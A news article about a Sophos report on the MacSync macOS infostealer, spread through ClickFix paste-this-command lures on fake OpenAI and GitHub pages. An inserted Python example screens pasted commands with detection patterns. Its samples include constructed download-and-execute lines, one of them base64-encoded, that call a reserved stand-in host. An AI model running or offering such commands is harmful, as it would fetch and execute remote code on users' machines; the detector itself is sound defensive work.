I used to be of the opinion that MacBooks are relatively safer than other laptops, but I have been proven wrong. Embarrassingly and demonstrably wrong. A new report from Sophos X-Ops has spared no effort in rubbing my nose in it. 

Researchers at the firm tracked three separate attack campaigns between November 2025 and February 2026, all of which targeted macOS users with something called the MacSync infostealer. For those catching up — it’s a type of malware that quietly rifles through your passwords and saved credentials, acting like a digital pickpocket. 

So, how does it actually work?

The malware used a delivery method called ClickFix, which requires minimal technical effort. It just needs the victims to copy and paste a command into their Mac’s Terminal (designed to run and execute text-based commands) and press enter on the keyboard.

First, bad actors used fake OpenAI download pages, which were circulated via sponsored ads on Google (sitting right above the legitimate link). Then, they got even more creative: attackers started sharing real ChatGPT shared conversations disguised as “helpful Mac guides.”

These guides routed users to fake GitHub pages containing carefully crafted software installation instructions. In reality, those instructions asked users to copy a Terminal command, allowing the MacSync infostealer to work in the background. That’s it; that’s the whole attack.
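As a defensive illustration of the paste-into-Terminal step described above, here is an added example (not code from Sophos or from the original article) that screens a command before anyone runs it. The patterns are assumptions about what ClickFix-style one-liners generally look like, not indicators from the report, and the sample commands are constructed.

```python
import base64
import re

# Assumed heuristics for ClickFix-style one-liners; not indicators from the Sophos report.
FETCH = re.compile(r"\b(curl|wget)\b")
RUNS_CODE = re.compile(
    r"\|\s*(sudo\s+)?(ba|z)?sh\b"      # output piped into a shell
    r"|\b(ba|z)?sh\s+-c\b"             # shell asked to run a string
    r"|\bosascript\b|\beval\b"         # AppleScript runner or eval
)
B64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(command):
    """Return readable text hidden in base64 runs so it can be scanned as well."""
    decoded = []
    for blob in B64_BLOB.findall(command):
        try:
            text = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")
        except ValueError:  # covers bad padding and non-UTF-8 bytes
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def review_pasted_command(command):
    """Return sorted risk labels for a command a web page asks the user to paste."""
    findings = set()
    if B64_DECODE.search(command) and RUNS_CODE.search(command):
        findings.add("decodes-and-executes")
    for depth, text in enumerate([command] + decode_blobs(command)):
        if FETCH.search(text) and RUNS_CODE.search(text):
            findings.add("download-and-execute" if depth == 0
                         else "hidden-download-and-execute")
    return sorted(findings)


# Constructed samples; example.invalid is a reserved, non-resolving name.
HIDDEN = base64.b64encode(b"curl -s https://example.invalid/x | sh").decode()
SAMPLES = {
    "benign": "softwareupdate --list",
    "installer": '/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    "encoded": f"echo {HIDDEN} | base64 -D | zsh",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, review_pasted_command(cmd) or "no findings")
```

A hit means the command would run code the reader never sees before it executes. Some legitimate installers use the same pattern, so a finding is a reason to inspect the command and its source, not a verdict.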

How bad did it get?

Sophos has found out that by December 2025 alone, bad actors had routed more than 50,000 clicks on such malicious domains. A “click” means that someone copied the malicious terminal command, but not necessarily that the malware successfully installed; the actual infection count could be lower. 

The developers put another spin on their attack method in February 2026, allowing it to run silently in the background, bypassing the competent macOS security tools such as Gatekeeper and XProtect. It can, in a very real way, patch your Ledger crypto wallet’s 24-word master key.

The firm reports that infection clusters were active in key markets, including parts of North and South America and India, as recently as weeks before they published the article (by the end of the beginning of March, possibly). 

Moreover, the notion that “Macs are safe” is, at least for the time being, not true. As AI platforms grow in popularity and, more importantly, gain the trust of millions of users, bad actors are coming up with new ways to use LLM-driven tools to their advantage. For now, I’d advise you not to paste any text-based command into your Mac’s Terminal.
